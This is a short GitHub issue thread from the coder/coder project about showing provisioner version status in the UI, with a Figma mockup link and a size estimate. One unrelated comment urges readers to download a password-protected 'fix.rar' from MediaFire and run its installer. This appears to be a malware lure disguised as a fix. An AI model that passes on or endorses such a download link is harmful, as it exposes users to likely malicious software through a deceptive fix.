### ISSUE TITLE
ui(provisioners): proper display of version info

### ISSUE THREAD

**Issue by aslilac** [coder/coder#14438]
Display the version information of each provisioner/group in the UI.

- Each provisioner should either show an "Up to date" or "Out of date" message, which the user can hover over for more details about the version.

- Groups in which all provisioners are running the same version can show the version number at a higher level, and groups with multiple versions should just say "Multiple versions"

**Comment by aslilac** [comment]
<img width="1280" alt="Provisioners View – Tagged Key" src="https://github.com/user-attachments/assets/4ac27149-e362-48f5-839a-59d8fee6e4aa">

https://www.figma.com/design/sruiQdZ5R73EBiaxqrVGxX/Provisioners?node-id=3071-282&t=0qcIIgUtLV1YesAR-1

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kira-Pilot** [comment]
Est: S
